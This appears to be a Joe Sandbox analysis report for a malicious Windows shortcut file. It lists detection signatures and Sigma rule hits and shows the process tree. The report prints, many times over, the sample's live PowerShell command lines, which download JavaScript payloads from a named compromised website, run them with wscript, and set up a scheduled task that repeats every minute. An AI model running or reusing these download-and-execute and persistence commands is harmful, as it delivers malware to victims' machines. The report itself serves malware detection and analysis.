Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mX3IqRiuFo.lnk

Overview

General Information

Sample name:mX3IqRiuFo.lnk
renamed because original name is a hash value
Original sample name:e02e837f8b43f14dd1de0c924fb9c7c2ead99fe1589bfb5126f120be5bc8599b.lnk
Analysis ID:1567190
MD5:ef8150f41db3c25684ff13470182898f
SHA1:6a10b98d8cd2fb0fa641d282ea30fc196638b8cd
SHA256:e02e837f8b43f14dd1de0c924fb9c7c2ead99fe1589bfb5126f120be5bc8599b
Tags:lnkwww-italialife24-ituser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Powershell download and execute
AI detected suspicious sample
Machine Learning detection for sample
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 5464 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $s9iJkyOlgfNn3 = New-Object Net.WebClient; $cio = $s9iJkyOlgfNn3.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $s9iJkyOlgfNn3.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'EB3Vk0QhrcN4wn.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('EB3Vk0QhrcN4wn.js ' * 2)) /tn HAoyOEGl0; MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6600 cmdline: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js " /tn HAoyOEGl0 MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • wscript.exe (PID: 4784 cmdline: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 4176 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js " MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 1016 cmdline: "C:\Windows\system32\schtasks.exe" /delete /tn EB3Vk0QhrcN4wn.js /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • wscript.exe (PID: 6600 cmdline: "C:\Windows\system32\wscript.exe" C:\ProgramData\241XU6KV2DFH.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 3184 cmdline: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 4236 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js " MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3224 cmdline: "C:\Windows\system32\schtasks.exe" /delete /tn EB3Vk0QhrcN4wn.js /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • wscript.exe (PID: 6464 cmdline: "C:\Windows\system32\wscript.exe" C:\ProgramData\241XU6KV2DFH.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 5348 cmdline: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 2976 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js " MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7144 cmdline: "C:\Windows\system32\schtasks.exe" /delete /tn EB3Vk0QhrcN4wn.js /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • wscript.exe (PID: 6860 cmdline: "C:\Windows\system32\wscript.exe" C:\ProgramData\241XU6KV2DFH.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 5464JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 5464INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x1d9:$b3: ::UTF8.GetString(
    • 0x17776:$b3: ::UTF8.GetString(
    • 0x179a5:$b3: ::UTF8.GetString(
    • 0x17df7:$b3: ::UTF8.GetString(
    • 0x181f6:$b3: ::UTF8.GetString(
    • 0x12c9a2:$b3: ::UTF8.GetString(
    • 0x12d834:$b3: ::UTF8.GetString(
    • 0x135145:$b3: ::UTF8.GetString(
    • 0x183d1c:$b3: ::UTF8.GetString(
    • 0x183f34:$b3: ::UTF8.GetString(
    • 0x18e458:$b3: ::UTF8.GetString(
    • 0x18e670:$b3: ::UTF8.GetString(
    • 0x18f6ed:$b3: ::UTF8.GetString(
    • 0x1b72e3:$b3: ::UTF8.GetString(
    • 0x1b74fb:$b3: ::UTF8.GetString(
    • 0x1c0943:$b3: ::UTF8.GetString(
    • 0x1c0b5b:$b3: ::UTF8.GetString(
    • 0x1c4264:$b3: ::UTF8.GetString(
    • 0x1c4fcf:$b3: ::UTF8.GetString(
    • 0x1d7ff7:$b3: ::UTF8.GetString(
    • 0x1da954:$b3: ::UTF8.GetString(

    Other

    SourceRuleDescriptionAuthorStrings
    amsi64_5464.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Potentially Suspicious PowerShell Child Processes
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js " /tn HAoyOEGl0, CommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js " /tn HAoyOEGl0, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $s9iJkyOlgfNn3 = New-Object Net.WebClient; $cio = $s9iJkyOlgfNn3.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $s9iJkyOlgfNn3.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'EB3Vk0QhrcN4wn.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('EB3Vk0QhrcN4wn.js ' * 2)) /tn HAoyOEGl0;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5464, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js " /tn HAoyOEGl0, ProcessId: 6600, ProcessName: schtasks.exe
      Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
      Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wscript.exe, SourceProcessId: 6600, StartAddress: B33FBCC0, TargetImage: C:\Windows\System32\schtasks.exe, TargetProcessId: 6600
      Sigma detected: Script Interpreter Execution From Suspicious Folder
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js, CommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js, ProcessId: 4784, ProcessName: wscript.exe
      Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js " /tn HAoyOEGl0, CommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js " /tn HAoyOEGl0, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $s9iJkyOlgfNn3 = New-Object Net.WebClient; $cio = $s9iJkyOlgfNn3.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $s9iJkyOlgfNn3.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'EB3Vk0QhrcN4wn.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('EB3Vk0QhrcN4wn.js ' * 2)) /tn HAoyOEGl0;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5464, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js " /tn HAoyOEGl0, ProcessId: 6600, ProcessName: schtasks.exe
      Sigma detected: Suspicious Invoke-WebRequest Execution
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js ", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js ", CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js, ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 4784, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js ", ProcessId: 4176, ProcessName: powershell.exe
      Sigma detected: Suspicious Script Execution From Temp Folder
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js, CommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js, ProcessId: 4784, ProcessName: wscript.exe
      Sigma detected: WScript or CScript Dropper
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js, CommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js, ProcessId: 4784, ProcessName: wscript.exe
      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5464, TargetFilename: C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js
      Sigma detected: PowerShell Download Pattern
      Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $s9iJkyOlgfNn3 = New-Object Net.WebClient; $cio = $s9iJkyOlgfNn3.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $s9iJkyOlgfNn3.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'EB3Vk0QhrcN4wn.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('EB3Vk0QhrcN4wn.js ' * 2)) /tn HAoyOEGl0;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $s9iJkyOlgfNn3 = New-Object Net.WebClient; $cio = $s9iJkyOlgfNn3.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $s9iJkyOlgfNn3.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'EB3Vk0QhrcN4wn.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('EB3Vk0QhrcN4wn.js ' * 2)) /tn HAoyOEGl0;, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $s9iJkyOlgfNn3 = New-Object Net.WebClient; $cio = $s9iJkyOlgfNn3.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $s9iJkyOlgfNn3.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'EB3Vk0QhrcN4wn.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('EB3Vk0QhrcN4wn.js ' * 2)) /tn HAoyOEGl0;, ProcessId: 5464, ProcessName: powershell.exe
      Sigma detected: PowerShell Web Download
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $s9iJkyOlgfNn3 = New-Object Net.WebClient; $cio = $s9iJkyOlgfNn3.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $s9iJkyOlgfNn3.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'EB3Vk0QhrcN4wn.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('EB3Vk0QhrcN4wn.js ' * 2)) /tn HAoyOEGl0;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $s9iJkyOlgfNn3 = New-Object Net.WebClient; $cio = $s9iJkyOlgfNn3.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $s9iJkyOlgfNn3.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'EB3Vk0QhrcN4wn.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('EB3Vk0QhrcN4wn.js ' * 2)) /tn HAoyOEGl0;, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $s9iJkyOlgfNn3 = New-Object Net.WebClient; $cio = $s9iJkyOlgfNn3.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $s9iJkyOlgfNn3.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'EB3Vk0QhrcN4wn.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('EB3Vk0QhrcN4wn.js ' * 2)) /tn HAoyOEGl0;, ProcessId: 5464, ProcessName: powershell.exe
      Sigma detected: Suspicious Schtasks From Env Var Folder
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js " /tn HAoyOEGl0, CommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js " /tn HAoyOEGl0, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $s9iJkyOlgfNn3 = New-Object Net.WebClient; $cio = $s9iJkyOlgfNn3.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $s9iJkyOlgfNn3.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'EB3Vk0QhrcN4wn.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('EB3Vk0QhrcN4wn.js ' * 2)) /tn HAoyOEGl0;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5464, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js " /tn HAoyOEGl0, ProcessId: 6600, ProcessName: schtasks.exe
      Sigma detected: Usage Of Web Request Commands And Cmdlets
      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $s9iJkyOlgfNn3 = New-Object Net.WebClient; $cio = $s9iJkyOlgfNn3.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $s9iJkyOlgfNn3.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'EB3Vk0QhrcN4wn.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('EB3Vk0QhrcN4wn.js ' * 2)) /tn HAoyOEGl0;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $s9iJkyOlgfNn3 = New-Object Net.WebClient; $cio = $s9iJkyOlgfNn3.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $s9iJkyOlgfNn3.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'EB3Vk0QhrcN4wn.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('EB3Vk0QhrcN4wn.js ' * 2)) /tn HAoyOEGl0;, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $s9iJkyOlgfNn3 = New-Object Net.WebClient; $cio = $s9iJkyOlgfNn3.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $s9iJkyOlgfNn3.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'EB3Vk0QhrcN4wn.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('EB3Vk0QhrcN4wn.js ' * 2)) /tn HAoyOEGl0;, ProcessId: 5464, ProcessName: powershell.exe
      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js, CommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js, ProcessId: 4784, ProcessName: wscript.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $s9iJkyOlgfNn3 = New-Object Net.WebClient; $cio = $s9iJkyOlgfNn3.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $s9iJkyOlgfNn3.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'EB3Vk0QhrcN4wn.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('EB3Vk0QhrcN4wn.js ' * 2)) /tn HAoyOEGl0;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $s9iJkyOlgfNn3 = New-Object Net.WebClient; $cio = $s9iJkyOlgfNn3.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $s9iJkyOlgfNn3.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'EB3Vk0QhrcN4wn.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + 